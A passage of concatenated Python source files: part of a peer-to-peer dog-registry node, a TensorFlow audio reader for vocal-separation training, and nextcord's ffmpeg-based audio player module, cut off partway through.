ret_pid, owner, name, breed, age = data.split()
t = threading.Thread(target=self.process_full_query, args=[ret_pid, owner, name, breed, age])
t.start()
except:
try:
ret_pid, owner = data.split()
t = threading.Thread(target=self.process_owner_query, args=[ret_pid, owner])
t.start()
except:
ret_pid = data
t = threading.Thread(target=self.process_peerid_query, args=[peerconn, ret_pid])
t.start()
def process_full_query(self, ret_pid, owner, name, breed, age):
"""
Process a search QUERY that contains full dog information:
owner name breed age
"""
for peerid, dogList in self.dogs.iteritems():
for dog in dogList:
if owner == dog['owner'] and name == dog['name'] and breed == dog['breed'] and age == dog['age']:
host, port = ret_pid.split(":")
data = { peerid: dogList }
self.connectandsend(host, int(port), QRESP, json.dumps(data, encoding='utf-8'), pid=ret_pid)
return
# Dog not found in known dogs, propagate to peers
for next in self.getpeerids():
data = ret_pid + ' ' + data
self.sendtopeer(next, QUERY, data)
def process_peerid_query(self, peerconn, ret_pid):
"""
Processes query asking for directly connected node's dogs they own
"""
# FIXME: ValueError: too many values to unpack on 250
print ret_pid
host, port = ret_pid.split(':')
try:
data = { self.myid: self.dogs[self.myid] }
except:
data = { self.myid: [] }
self.connectandsend(host, int(port), QRESP, json.dumps(data, encoding='utf-8'), pid=ret_pid)
def process_owner_query(self, ret_pid, owner):
"""
Processes query with just an owner's name
"""
for peerid, dogList in self.dogs.iteritems():
for dog in dogList:
if owner == dog['owner']: #send back all dogs
host, port = ret_pid.split(':')
data = { peerid: dogList }
self.connectandsend(host, int(port), QRESP, json.dumps(data, encoding='utf-8'), pid=ret_pid)
return
# Owner not found in known dogs, propagate to peers
for next in self.getpeerids():
self.sendtopeer(next, QUERY, '%s:%s' % (ret_pid, owner))
def handle_qresponse(self, peerconn, data):
"""
Handles the different responses possible from the 3 query types
"""
try:
data = json.loads(data) #{peerid: [{}, {}]}
peerid = next(iter(data))
dogList = data[peerid] #[{}, {}]
self.dogs[peerid] = []
for dog in dogList:
dog['owner'] = dog['owner'].encode('ascii', 'replace')
dog['name'] = dog['name'].encode('ascii', 'replace')
dog['breed'] = dog['breed'].encode('ascii', 'replace')
dog['age'] = dog['age'].encode('ascii', 'replace')
self.dogs[peerid].append({'owner': dog['owner'], 'name': dog['name'], 'breed': dog['breed'], 'age': dog['age']})
except:
self._debug('Error handling query response.')
def handle_meet(self, peerconn, data):
"""
Handles a meetup request from a peer.
"""
try:
peerid, location, date, time = data.split()
self.meetups[peerid] = { 'to': self.myid, 'location': location, 'date': date, 'time': time, 'accepted': None }
except:
peerconn.senddata(ERROR, 'Error delivering meetup request')
def handle_meet_reply(self, peerconn, data):
"""
Handles response to a meetup request (yes or no)
If Yes, change the corresponding request's 'Accepted' parameter to True
If No, change the corresponding request's 'Accepted' parameter to False
"""
toId, answer = data.split()
for fromId in self.meetups:
if self.meetups[fromId]['to'] == toId:
if answer == 'Yes':
self.meetups[fromId]['accepted'] = True
else:
self.meetups[fromId]['accepted'] = False
def __router(self, peerid):
if peerid not in self.getpeerids():
return (None, None, None)
else:
rt = [peerid]
rt.extend(self.peers[peerid])
return rt
def __debug(self, msg):
if self.debug:
btdebug(msg)
|
AudioReaderVS.py
|
import fnmatch
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
import soundfile as sf
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
id_reg_expression = re.compile(FILE_PATTERN)
min_id = None
max_id = None
for filename in files:
matches = id_reg_expression.findall(filename)[0]
id, recording_id = [int(id_) for id_ in matches]
if min_id is None or id < min_id:
min_id = id
if max_id is None or id > max_id:
max_id = id
return min_id, max_id
def randomize_files(files):
for file in files:
file_index = random.randint(0, (len(files) - 1))
yield files[file_index]
def find_files(directory, pattern='*.wav'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def load_one_audio(directory, sample_rate,trainOrNot=True):
if(trainOrNot):
allfiles = [['./vsCorpus/origin_mix.wav','./vsCorpus/origin_vocal.wav']]
else:
allfiles = [['./vsCorpus/pred_mix.wav','./vsCorpus/pred_vocal.wav']]
for filename in allfiles:
audio0, samplerate = sf.read(filename[0], dtype='float32')
audio0 = librosa.resample(audio0.T, samplerate, sample_rate)
audio0 = audio0.reshape(-1, 1)
audio1, samplerate = sf.read(filename[1], dtype='float32')
audio1 = librosa.resample(audio1.T, samplerate, sample_rate)
audio1 = audio1.reshape(-1, 1)
assert(audio0.shape==audio1.shape)
yield audio0,audio1, filename, 0
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
id_reg_exp = re.compile(FILE_PATTERN)
print("files length: {}".format(len(files)))
randomized_files = randomize_files(files)
for filename in randomized_files:
#print(filename)
ids = id_reg_exp.findall(filename)
#print(ids)
if not ids:
# The file name does not match the pattern containing ids, so
# there is no id.
category_id = None
else:
# The file name matches the pattern for containing ids.
category_id = int(ids[0][0])
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
#print(librosa.load(filename, sr=sample_rate, mono=True)[0].shape) #(65584,) 16000
#print(librosa.load(filename, mono=True)[0].shape,librosa.load(filename, mono=True)[1]) #(90383,) 22050
#(65584,) 16000 ((65584,) / 16000 == (90383,) 22050)True
audio = audio.reshape(-1, 1)
#print(filename, category_id)
yield audio, filename, category_id
def trim_silence(audio0,audio1, threshold, frame_length=2048):
'''Removes silence at the beginning and end of a sample.'''
if audio0.size < frame_length:
frame_length = audio0.size
energy = librosa.feature.rmse(audio0, frame_length=frame_length//2)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
#print('frame',librosa.core.frames_to_samples(frames))
# Note: indices can be an empty array, if the whole audio was silence.
if(len(indices)):return audio0[indices[0]:indices[-1]],audio1[indices[0]:indices[-1]]
return audio0[0:0],audio1[0:0]
def not_all_have_id(files):
''' Return true iff any of the filenames does not conform to the pattern
we require for determining the category id.'''
id_reg_exp = re.compile(FILE_PATTERN)
for file in files:
ids = id_reg_exp.findall(file)
if not ids:
return True
return False
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
gc_enabled,
receptive_field,
sample_size=None,
silence_threshold=None,
queue_size=32):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.receptive_field = receptive_field
self.silence_threshold = silence_threshold
self.gc_enabled = gc_enabled
self.threads = []
self.trxsample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.trysample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.trxqueue = tf.PaddingFIFOQueue(1,['float32'],shapes=[(None, 1)])
self.tryqueue = tf.PaddingFIFOQueue(1,['float32'],shapes=[(None, 1)])
self.trxenqueue = self.trxqueue.enqueue([self.trxsample_placeholder])
self.tryenqueue = self.tryqueue.enqueue([self.trysample_placeholder])
#self.vxsample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
#self.vysample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
#self.vxqueue = tf.PaddingFIFOQueue(4,['float32'],shapes=[(None, 1)])
#self.vyqueue = tf.PaddingFIFOQueue(4,['float32'],shapes=[(None, 1)])
#self.vxenqueue = self.vxqueue.enqueue([self.vxsample_placeholder])
#self.vyenqueue = self.vyqueue.enqueue([self.vysample_placeholder])
if self.gc_enabled:
##TODO trxaudio,tryaudio
pass
self.id_placeholder = tf.placeholder(dtype=tf.int32, shape=())
self.gc_queue = tf.PaddingFIFOQueue(queue_size, ['int32'],
shapes=[()])
self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
files = find_files(audio_dir)
if not files:
raise ValueError("No audio files found in '{}'.".format(audio_dir))
if self.gc_enabled and not_all_have_id(files):
raise ValueError("Global conditioning is enabled, but file names "
"do not conform to pattern having id.")
# Determine the number of mutually-exclusive categories we will
# accomodate in our embedding table.
if self.gc_enabled:
##TODO xaudio,yaudio
pass
_, self.gc_category_cardinality = get_category_cardinality(files)
# Add one to the largest index to get the number of categories,
# since tf.nn.embedding_lookup expects zero-indexing. This
# means one or more at the bottom correspond to unused entries
# in the embedding lookup table. But that's a small waste of memory
# to keep the code simpler, and preserves correspondance between
# the id one specifies when generating, and the ids in the
# file names.
self.gc_category_cardinality += 1
print("Detected --gc_cardinality={}".format(
self.gc_category_cardinality))
else:
self.gc_category_cardinality = None
def trdequeue(self, num_elements):
print('trdequeue')
output = (self.trxqueue.dequeue_many(num_elements),self.tryqueue.dequeue_many(num_elements))
return output
'''def vdequeue(self, num_elements):
print('vdequeue')
output = (self.vxqueue.dequeue_many(num_elements),self.vyqueue.dequeue_many(num_elements))
return output'''
def dequeue_gc(self, num_elements):
##TODO trxaudio,tryaudio
pass
return self.gc_queue.dequeue_many(num_elements)
def valbatch(self):
stop = False
#filename = ['./vsCorpus/origin_mix.wav','./vsCorpus/origin_vocal.wav']
filename = ['./vsCorpus/pred_mix.wav','./vsCorpus/pred_vocal.wav']
#print('val',filename)
audio0, samplerate = sf.read(filename[0], dtype='float32')
audio0 = librosa.resample(audio0.T, samplerate, self.sample_rate)
audio0 = audio0.reshape(-1, 1)
audio1, samplerate = sf.read(filename[1], dtype='float32')
audio1 = librosa.resample(audio1.T, samplerate, self.sample_rate)
audio1 = audio1.reshape(-1, 1)
assert(audio0.shape==audio1.shape)
vxaudio = np.pad(audio0, [[self.receptive_field, 0], [0, 0]],'constant')
vyaudio = np.pad(audio1, [[self.receptive_field, 0], [0, 0]],'constant')
vxaudio=tf.convert_to_tensor(vxaudio, dtype=tf.float32)
vyaudio=tf.convert_to_tensor(vyaudio, dtype=tf.float32)
return (vxaudio,vyaudio)
def thread_train(self, sess):
stop = False
# Go through the dataset multiple times
filename = ['./vsCorpus/origin_mix.wav','./vsCorpus/origin_vocal.wav']
audio0, samplerate = sf.read(filename[0], dtype='float32')
audio0 = librosa.resample(audio0.T, samplerate, self.sample_rate)
audio0 = audio0.reshape(-1, 1)
audio0 = np.pad(audio0, [[self.receptive_field, 0], [0, 0]],'constant')
audio1, samplerate = sf.read(filename[1], dtype='float32')
audio1 = librosa.resample(audio1.T, samplerate, self.sample_rate)
audio1 = audio1.reshape(-1, 1)
audio1 = np.pad(audio1, [[self.receptive_field, 0], [0, 0]],'constant')
assert(audio0.shape==audio1.shape)
while not stop:
if self.coord.should_stop():
stop = True
break
if self.silence_threshold is not None:
# Remove silence
trxaudio,tryaudio = trim_silence(trxaudio[:, 0],tryaudio[:, 0], self.silence_threshold)
trxaudio,tryaudio = trxaudio.reshape(-1, 1),tryaudio.reshape(-1, 1)
if trxaudio.size == 0:
print("Warning: {} was ignored as it contains only "
"silence. Consider decreasing trim_silence "
"threshold, or adjust volume of the trxaudio."
.format(filename))
#print(self.sample_size)
if self.sample_size: ##SAMPLE_SIZE = 100000
# Cut samples into pieces of size receptive_field +
# sample_size with receptive_field overlap
#receptive_field=5117
lens = self.sample_size+self.receptive_field
startnum = np.arange(len(audio0)-lens)
np.random.shuffle(startnum)
#print('train',startnum)
for i in startnum:
#print('trx',sess.run(self.trxqueue.size()))
#print('try',sess.run(self.tryqueue.size()))
#print('tr',filename)
trxpiece = audio0[i:i+lens, :]+np.random.randn(lens,1)*(1e-5)
trxpiece = np.pad(trxpiece, [[self.receptive_field, 0], [0, 0]],'constant')
sess.run(self.trxenqueue,feed_dict={self.trxsample_placeholder: trxpiece})
trypiece = audio1[i:i+lens, :]+np.random.randn(lens,1)*(1e-5)
trypiece = np.pad(trypiece, [[self.receptive_field, 0], [0, 0]],'constant')
sess.run(self.tryenqueue,feed_dict={self.trysample_placeholder: trypiece})
if self.gc_enabled:
pass ##TODO trxaudio,tryaudio
sess.run(self.gc_enqueue, feed_dict={self.id_placeholder: category_id})
'''while len(trxaudio) > self.receptive_field:
trxpiece = trxaudio[:(self.receptive_field +self.sample_size), :]
sess.run(self.trxenqueue,feed_dict={self.trxsample_placeholder: trxpiece})
trxaudio = trxaudio[self.sample_size:, :]
trypiece = tryaudio[:(self.receptive_field +self.sample_size), :]
sess.run(self.tryenqueue,feed_dict={self.trysample_placeholder: trypiece})
tryaudio = tryaudio[self.sample_size:, :]'''
'''else:
sess.run(self.trxenqueue,feed_dict={self.trxsample_placeholder: trxaudio})
sess.run(self.tryenqueue,feed_dict={self.trysample_placeholder: tryaudio})
if self.gc_enabled:
##TODO trxaudio,tryaudio
pass
sess.run(self.gc_enqueue,
feed_dict={self.id_placeholder: category_id})'''
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread0 = threading.Thread(target=self.thread_train, args=(sess,))
thread0.daemon = True # Thread will close when parent quits.
thread0.start()
self.threads.append(thread0)
return self.threads
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2021 xXSergeyXx
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------
Авторские права (c) 2021 xXSergeyXx
Данная лицензия разрешает лицам, получившим копию данного программного
обеспечения и сопутствующей документации (в дальнейшем именуемыми «Программное обеспечение»),
безвозмездно использовать Программное обеспечение без ограничений, включая неограниченное
право на использование, копирование, изменение, слияние, публикацию, распространение,
сублицензирование и/или продажу копий Программного обеспечения, а также лицам, которым
предоставляется данное Программное обеспечение, при соблюдении следующих условий:
Указанное выше уведомление об авторском праве и данные условия должны быть включены во
все копии или значимые части данного Программного обеспечения.
ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ «КАК ЕСТЬ», БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ, ЯВНО ВЫРАЖЕННЫХ
ИЛИ ПОДРАЗУМЕВАЕМЫХ, ВКЛЮЧАЯ ГАРАНТИИ ТОВАРНОЙ ПРИГОДНОСТИ, СООТВЕТСТВИЯ ПО ЕГО КОНКРЕТНОМУ
НАЗНАЧЕНИЮ И ОТСУТСТВИЯ НАРУШЕНИЙ, НО НЕ ОГРАНИЧИВАЯСЬ ИМИ. НИ В КАКОМ СЛУЧАЕ АВТОРЫ ИЛИ ПРАВООБЛАДАТЕЛИ
НЕ НЕСУТ ОТВЕТСТВЕННОСТИ ПО КАКИМ-ЛИБО ИСКАМ, ЗА УЩЕРБ ИЛИ ПО ИНЫМ ТРЕБОВАНИЯМ, В ТОМ ЧИСЛЕ, ПРИ
ДЕЙСТВИИ КОНТРАКТА, ДЕЛИКТЕ ИЛИ ИНОЙ СИТУАЦИИ, ВОЗНИКШИМ ИЗ-ЗА ИСПОЛЬЗОВАНИЯ ПРОГРАММНОГО
ОБЕСПЕЧЕНИЯ ИЛИ ИНЫХ ДЕЙСТВИЙ С ПРОГРАММНЫМ ОБЕСПЕЧЕНИЕМ.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
CREATE_NO_WINDOW: int
if sys.platform != 'win32':
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
args = [executable, *args]
kwargs = {'stdout': subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[Bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f'popen-stdin-writer:{id(self):#x}'
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
raise ClientException(executable + ' was not found.') from None
except subprocess.SubprocessError as exc:
raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info('Preparing to terminate ffmpeg process %s.', proc.pid)
try:
proc.kill()
except Exception:
_log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)
if proc.poll() is None:
_log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
proc.communicate()
_log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
else:
_log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = 'ffmpeg',
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
args.extend(('-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = 'ffmpeg',
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
codec = 'copy' if codec in ('opus', 'libopus') else 'libopus'
args.extend(('-map_metadata', '-1',
'-f', 'opus',
'-c:a', codec,
'-ar', '48000',
'-ac', '2',
'-b:a', f'{bitrate}k',
'-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await nextcord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await nextcord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await nextcord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get('executable')
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or 'native'
executable = executable or 'ffmpeg'
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, '_probe_codec_' + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError("Expected str or callable for parameter 'probe', " \
f"not '{method.__class__.__name__}'")
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data['streams'][0]
codec = streamdata.get('codec_name')
bitrate = int(streamdata.get('bit_rate', 0))
bitrate = max(round(bitrate/1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
args = [executable, '-hide_banner', '-i', source]
proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate(timeout=20)
output = out.decode('utf8')
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b'')
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
